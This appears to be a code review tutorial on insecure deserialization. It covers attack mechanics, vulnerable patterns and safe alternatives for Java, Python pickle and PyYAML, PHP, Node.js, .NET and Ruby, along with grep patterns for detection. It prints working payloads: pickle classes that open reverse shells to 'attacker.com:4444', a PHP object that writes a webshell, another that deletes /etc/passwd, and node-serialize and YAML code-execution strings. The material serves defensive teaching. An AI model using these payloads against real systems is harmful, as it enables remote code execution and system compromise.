What is insecure deserialization?

Insecure deserialization is when an application deserializes untrusted data, allowing attackers to manipulate object state or, with vulnerable gadget chains, achieve remote code execution.

How do you prevent insecure deserialization?

Avoid deserializing untrusted data, prefer data-only formats like JSON with strict schemas, use allowlists of permitted types, and apply integrity checks such as signatures.

Insecure Deserialization Code Review Guide

01 //1. Introduction to Insecure Deserialization

Insecure deserialization occurs when an application deserializes (reconstructs objects from) data that an attacker has tampered with. Serialization converts in-memory objects into a byte stream for storage or transmission; deserialization reverses this. When the serialized data comes from an untrusted source, the deserialization process can instantiate arbitrary objects and trigger magic methods (constructors, destructors, hooks) that execute attacker-controlled code.

⚠ OWASP A08:2021 — Software and Data Integrity Failures

Insecure deserialization was ranked in the OWASP Top 10 (A8:2017) and merged into "Software and Data Integrity Failures" (A08:2021). It consistently leads to Remote Code Execution — the most critical impact. The vulnerability is language-agnostic: Java, Python, PHP, .NET, Ruby, and even Node.js all have dangerous deserialization patterns. Some of the largest breaches in history (Equifax, PayPal) involved deserialization attacks.

In this guide, you'll learn how serialization/deserialization works and why it's dangerous, specific exploitation techniques for Java, Python, PHP, Node.js, .NET, and Ruby, what gadget chains are and how they achieve RCE, how to identify dangerous deserialization patterns during code review, and how to prevent deserialization attacks with safe alternatives.

$ ./diagram --attack-flow

Attacker

crafts malicious object

→

Transport

cookie · API · queue · file

→

Application

deserializes untrusted data

→

RCE

magic methods execute

Java

ObjectInputStream

Critical

Python

pickle.loads()

Critical

PHP

unserialize()

Critical

Node.js

node-serialize

Critical

.NET

BinaryFormatter

Critical

Ruby

Marshal.load()

Critical

YAML

yaml.load()

High

JSON

JSON.parse()

Safe

Why is JSON.parse() generally safe while pickle.loads() and Java's ObjectInputStream are dangerous?

02 //2. How Deserialization Attacks Work

The attack follows a consistent pattern across all languages: (1) The application serializes objects and exposes them to the client (cookies, API responses, message queues). (2) The attacker modifies the serialized data to reference dangerous classes. (3) The application deserializes the modified data, instantiating attacker-chosen objects. (4) Magic methods on those objects execute during deserialization, running attacker code.

Magic methods are special methods that the language runtime calls automatically during object lifecycle events. In serialization attacks, the key magic methods are:

Magic Methods Triggered During Deserialization

Language	Method	When Called	Danger
Java	readObject()	When ObjectInputStream reconstructs the object	Can execute arbitrary code if the class implements readObject()
Java	readResolve()	After readObject() to resolve object references	Can substitute a different object
Python	__reduce__()	Returns a callable + args that pickle uses to reconstruct	Directly specifies what function to call — trivial RCE
Python	__setstate__()	Called to restore object state after creation	Can execute code during state restoration
PHP	__wakeup()	Called immediately when unserialize() creates the object	Common in gadget chains that trigger further actions
PHP	__destruct()	Called when the object is garbage collected	Deferred execution — even if __wakeup is restricted
.NET	OnDeserialized()	Callback after deserialization completes	Executes attacker logic post-deserialization
Ruby	marshal_load()	Called to restore object from marshaled data	Can execute arbitrary code during load

Simplest deserialization attack: Python pickle

python

1import pickle
2import os
3
4# Legitimate serialized data (a simple dictionary):
5safe_data = pickle.dumps({"user": "alice", "role": "viewer"})
6# b'\x80\x05\x95...'
7
8# Attacker crafts a malicious class:
9class Exploit:
10    def __reduce__(self):
11        # __reduce__ tells pickle HOW to reconstruct this object
12        # It returns: (callable, args)
13        # pickle will call: os.system("id")
14        return (os.system, ("id",))
15
16malicious_data = pickle.dumps(Exploit())
17
18# Application deserializes untrusted data:
19result = pickle.loads(malicious_data)
20# → Executes "id" command on the server!
21# uid=1000(webapp) gid=1000(webapp)
22
23# The attacker never needed to know what the original data looked like.
24# They just need pickle.loads() to process their crafted bytes.

An application receives serialized objects via cookies. A developer adds HMAC signature verification before deserialization. Is this sufficient?

03 //3. Java Deserialization

Java deserialization is the most extensively researched and exploited deserialization vulnerability class. Java's ObjectInputStream can instantiate any serializable class on the classpath, and the rich Java library ecosystem provides abundant "gadget chains" — sequences of classes whose methods chain together to achieve code execution.

Vulnerable: Deserializing untrusted Java objects

java

1// ❌ VULNERABLE: Deserializing user-controlled data
2import java.io.*;
3
4public class UserSessionHandler {
5
6    // Receives serialized session from cookie or API body
7    public UserSession loadSession(byte[] data) throws Exception {
8        ByteArrayInputStream bis = new ByteArrayInputStream(data);
9        ObjectInputStream ois = new ObjectInputStream(bis);
10
11        // This single line can execute ARBITRARY CODE
12        // if the attacker controls the byte[] data!
13        Object obj = ois.readObject();  // ← RCE happens HERE
14
15        return (UserSession) obj;  // Cast happens AFTER deserialization
16        // Even if the cast fails, the damage is already done —
17        // malicious readObject() methods have already executed
18    }
19}
20
21// The cast to UserSession is NOT a security check!
22// By the time Java tries the cast, ObjectInputStream has already:
23// 1. Parsed the serialized bytes
24// 2. Instantiated the attacker's chosen classes
25// 3. Called readObject() on each — executing malicious code

Java serialized data is identifiable by its magic bytes: AC ED 00 05 (hex) or rO0AB (Base64-encoded). During code review, search for these signatures in cookies, HTTP headers, API bodies, and message queues.

Where Java deserialization appears in applications

java

1// Common Java deserialization surfaces:
2
3// 1. HTTP cookies or parameters (Base64-encoded)
4String sessionData = request.getCookie("session").getValue();
5byte[] decoded = Base64.getDecoder().decode(sessionData);
6ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(decoded));
7Object session = ois.readObject();  // ❌ RCE
8
9// 2. JMX (Java Management Extensions) — often exposed on internal ports
10// Remote JMX uses ObjectInputStream internally
11
12// 3. RMI (Remote Method Invocation) — inter-service communication
13// RMI protocol uses Java serialization by default
14
15// 4. Message queues (ActiveMQ, RabbitMQ with Java serialization)
16ObjectMessage msg = (ObjectMessage) consumer.receive();
17Object payload = msg.getObject();  // ❌ RCE
18
19// 5. ViewState in JSF (JavaServer Faces)
20// Encrypted/signed ViewState can be attacked if the key is known
21
22// 6. Spring Session with Java serialization
23// Spring can serialize session data to Redis/database using ObjectInputStream

$ heuristic — The Gadget Chain Concept

The attacker doesn't need to find a custom vulnerable class. They chain together methods from common libraries already on the classpath (Apache Commons Collections, Spring, Hibernate). A "gadget chain" is a sequence like: Apache Commons Collections InvokerTransformer → calls Runtime.exec(). Tools like ysoserial generate payloads for dozens of known gadget chains across popular Java libraries.

You find ObjectInputStream.readObject() in your codebase. The developer says it's safe because the application only serializes UserSession objects. What's wrong with this argument?

04 //4. Python pickle & PyYAML

Python's pickle module is explicitly documented as unsafe: "Warning: The pickle module is not secure. Only unpickle data you trust." Despite this, pickle is widely used for caching, session storage, ML model serialization, and inter-process communication.

Python pickle: Multiple RCE techniques

python

1import pickle, os
2
3# Technique 1: __reduce__ method (most common)
4class RCE1:
5    def __reduce__(self):
6        return (os.system, ("id",))
7
8# Technique 2: Reverse shell via __reduce__
9class RCE2:
10    def __reduce__(self):
11        import subprocess
12        return (subprocess.call, (["/bin/bash", "-c",
13            "bash -i >& /dev/tcp/attacker.com/4444 0>&1"],))
14
15# Technique 3: Arbitrary code via exec
16class RCE3:
17    def __reduce__(self):
18        return (exec, ("import socket,subprocess,os;"
19            "s=socket.socket();"
20            "s.connect(('attacker.com',4444));"
21            "os.dup2(s.fileno(),0);"
22            "os.dup2(s.fileno(),1);"
23            "os.dup2(s.fileno(),2);"
24            "subprocess.call(['/bin/sh','-i'])",))
25
26# Technique 4: Using eval (shorter payload)
27class RCE4:
28    def __reduce__(self):
29        return (eval, ("__import__('os').system('id')",))
30
31# Any of these, when serialized and deserialized:
32payload = pickle.dumps(RCE1())
33pickle.loads(payload)  # → Executes "id" on the server

PyYAML: YAML deserialization RCE

python

1import yaml
2
3# ❌ VULNERABLE: yaml.load() with full Loader
4# PyYAML can instantiate Python objects via YAML tags
5
6malicious_yaml = """
7!!python/object/apply:os.system
8  args: ['id']
9"""
10
11# yaml.load(malicious_yaml, Loader=yaml.FullLoader)  # RCE in older PyYAML
12yaml.load(malicious_yaml, Loader=yaml.UnsafeLoader)  # Explicit unsafe
13
14# Other YAML RCE payloads:
15# !!python/object/new:subprocess.check_output [['id']]
16# !!python/object/apply:subprocess.Popen
17#   - ['cat', '/etc/passwd']
18
19# ✅ SAFE: Always use yaml.safe_load()
20data = yaml.safe_load(user_input)  # Only creates basic Python types

$ grep — Where Pickle Appears in Codebases

During code review, search for these pickle usage patterns: pickle.loads() on data from HTTP requests, cookies, or database fields. shelve module (uses pickle internally). joblib.load() for ML model loading. torch.load() for PyTorch models (uses pickle). Redis/Memcached session storage with pickle serialization. Celery task arguments serialized with pickle. pandas.read_pickle() for DataFrame serialization.

05 //5. PHP unserialize()

PHP's unserialize() is one of the most commonly exploited deserialization functions in web applications. PHP serialized data is human-readable (e.g., O:4:"User":1:{s:4:"name";s:5:"alice";}), making it easy for attackers to craft payloads.

PHP unserialize: Exploitation via __wakeup and __destruct

php

1// PHP serialized format is text-based and readable:
2// O:4:"User":1:{s:4:"name";s:5:"alice";}
3// O = Object, 4 = class name length, "User" = class name
4// 1 = number of properties, s:4:"name" = string property name
5// s:5:"alice" = string property value
6
7// ❌ VULNERABLE: Deserializing user-controlled data
8$data = unserialize($_COOKIE['session']);
9
10// Attacker exploits PHP magic methods:
11// __wakeup()   — called when object is unserialized
12// __destruct() — called when object is destroyed (garbage collection)
13// __toString() — called when object is used as string
14
15// Example: File deletion via __destruct
16class CacheFile {
17    public $filename;
18    public function __destruct() {
19        // Cleanup: delete cache file when object is destroyed
20        unlink($this->filename);  // ← Attacker controls $filename!
21    }
22}
23
24// Attacker sends cookie with:
25// O:9:"CacheFile":1:{s:8:"filename";s:11:"/etc/passwd";}
26// When the object is garbage collected, __destruct() deletes /etc/passwd!
27
28// For RCE, chain through classes that call eval(), system(), exec(), etc.
29class Logger {
30    public $logFile;
31    public $logData;
32    public function __destruct() {
33        file_put_contents($this->logFile, $this->logData);
34    }
35}
36// Attacker writes a PHP webshell:
37// O:6:"Logger":2:{s:7:"logFile";s:14:"/var/www/s.php";s:7:"logData";s:29:"<?php system($_GET['cmd']); ?>";}

Where PHP unserialize appears

php

1// ❌ Common vulnerable patterns in PHP applications:
2
3// 1. Session data in cookies
4$session = unserialize(base64_decode($_COOKIE['session']));
5
6// 2. User preferences
7$prefs = unserialize($row['preferences']); // From database
8
9// 3. Cached objects
10$cached = unserialize(file_get_contents($cacheFile));
11
12// 4. API parameters
13$data = unserialize($_POST['data']);
14
15// 5. WordPress serialized options
16$options = unserialize(get_option('my_plugin_settings'));
17
18// ✅ SAFE alternatives:
19$data = json_decode($input, true);  // Use JSON instead
20// Or restrict allowed classes (PHP 7+):
21$data = unserialize($input, ['allowed_classes' => ['User', 'Settings']]);

A PHP application uses unserialize() on data from the database, not directly from user input. Is this safe?

06 //6. Node.js & YAML Deserialization

Node.js doesn't have a built-in native serialization format like Java or Python. However, several npm packages provide serialization that can lead to RCE, and YAML parsing across all languages can be dangerous.

node-serialize: RCE via IIFE in serialized functions

javascript

1// The "node-serialize" package can serialize/deserialize functions
2// ❌ This package has a known RCE vulnerability (CVE-2017-5941)
3
4const serialize = require('node-serialize');
5
6// Attacker crafts a payload with an immediately-invoked function:
7const payload = '{"exploit":"_$$ND_FUNC$$_function(){require(\'child_process\').execSync(\'id\')}()"}';
8
9// When deserialized, the function is reconstructed AND executed:
10serialize.unserialize(payload);
11// → Executes "id" on the server!
12
13// The _$$ND_FUNC$$_ marker tells node-serialize to treat the value
14// as a function. The trailing () makes it an IIFE — executed immediately.

js-yaml and other YAML parsers

javascript

1// js-yaml (Node.js) — older versions had dangerous defaults
2const yaml = require('js-yaml');
3
4// ❌ VULNERABLE (older js-yaml with DEFAULT_FULL_SCHEMA):
5const data = yaml.load(userInput, { schema: yaml.DEFAULT_FULL_SCHEMA });
6// Custom YAML tags could instantiate JavaScript objects
7
8// ✅ SAFE: Modern js-yaml defaults to safe schema
9const data = yaml.load(userInput); // Safe by default since js-yaml 4.x
10
11// ✅ SAFE: Explicitly use safe load
12const data = yaml.load(userInput, { schema: yaml.DEFAULT_SAFE_SCHEMA });
13
14// General rule across all languages:
15// - Python: yaml.safe_load() ✅, yaml.load(Loader=FullLoader) ❌
16// - Ruby: YAML.safe_load() ✅, YAML.load() ❌ (Ruby < 3.1)
17// - Java (SnakeYAML): new Yaml(new SafeConstructor()) ✅, new Yaml() ❌

$ grep — Other Dangerous Node.js Patterns

Beyond dedicated serialization libraries, watch for these Node.js patterns: eval() or new Function() on serialized/stored data. vm.runInNewContext() with user-controlled code (sandbox escapes exist). MongoDB query injection via $where (executes JavaScript server-side). Redis EVAL with user-controlled Lua scripts.

07 //7. Detection During Code Review

Deserialization vulnerabilities follow language-specific patterns. During code review, systematically search for deserialization functions that process untrusted data.

Deserialization Detection by Language

Language	Dangerous Functions	Magic Bytes / Signatures	Safe Alternative
Java	ObjectInputStream.readObject(), readUnshared(), XMLDecoder.readObject()	AC ED 00 05 (hex), rO0AB (Base64)	JSON (Jackson/Gson), Protocol Buffers
Python	pickle.loads(), shelve.open(), joblib.load(), torch.load()	\x80\x05\x95 (pickle protocol 5)	json.loads(), yaml.safe_load()
PHP	unserialize()	O:, a:, s:, i: prefixes (text-based)	json_decode(), allowed_classes option
Node.js	node-serialize.unserialize(), cryo.parse()	_$$ND_FUNC$$_ marker	JSON.parse() (always safe)
.NET	BinaryFormatter.Deserialize(), ObjectStateFormatter, LosFormatter	00 01 00 00 00 FF FF FF FF	System.Text.Json, protobuf-net
Ruby	Marshal.load(), YAML.load() (< 3.1)	\x04\x08 (Marshal magic)	JSON.parse(), YAML.safe_load()
YAML (all)	yaml.load() (Python), YAML.load (Ruby), Yaml() (Java SnakeYAML)	!!python/object, !!ruby/object tags	safe_load(), SafeConstructor

Quick grep patterns for deserialization

bash

1# Java
2grep -rn "ObjectInputStream|readObject()|readUnshared()|XMLDecoder|XStream"   --include="*.java"
3
4# Python
5grep -rn "pickle\.loads|pickle\.load|shelve\.|joblib\.load|torch\.load|yaml\.load|yaml\.full_load"   --include="*.py"
6
7# PHP
8grep -rn "unserialize(" --include="*.php"
9
10# Node.js
11grep -rn "unserialize|deserialize|node-serialize|cryo"   --include="*.js" --include="*.ts"
12
13# .NET
14grep -rn "BinaryFormatter|ObjectStateFormatter|NetDataContractSerializer|LosFormatter|SoapFormatter"   --include="*.cs"
15
16# Ruby
17grep -rn "Marshal\.load|YAML\.load[^_]" --include="*.rb"
18
19# Check for Java serialized data in cookies/tokens
20grep -rn "rO0AB|ACED0005|base64.*decode.*readObject"   --include="*.java" --include="*.xml" --include="*.properties"

You find this in a Python Flask application: session_data = pickle.loads(redis.get(session_id)). The developer says Redis is internal and trusted. Should you flag this?

Learn the patterns,
then go find them.

Insecure Deserialization Code Review Guide

01 //1. Introduction to Insecure Deserialization

02 //2. How Deserialization Attacks Work

Magic Methods Triggered During Deserialization

03 //3. Java Deserialization

04 //4. Python pickle & PyYAML

05 //5. PHP unserialize()

06 //6. Node.js & YAML Deserialization

07 //7. Detection During Code Review

Deserialization Detection by Language

Blurred Premium Content

More Value Behind This Gate

Premium Content

Frequently asked questions

Learn the patterns,then go find them.

01 //1. Introduction to Insecure Deserialization

02 //2. How Deserialization Attacks Work

Magic Methods Triggered During Deserialization

03 //3. Java Deserialization

04 //4. Python pickle & PyYAML

05 //5. PHP unserialize()

06 //6. Node.js & YAML Deserialization

07 //7. Detection During Code Review

Deserialization Detection by Language

Blurred Premium Content

More Value Behind This Gate

Premium Content

Frequently asked questions

Learn the patterns,
then go find them.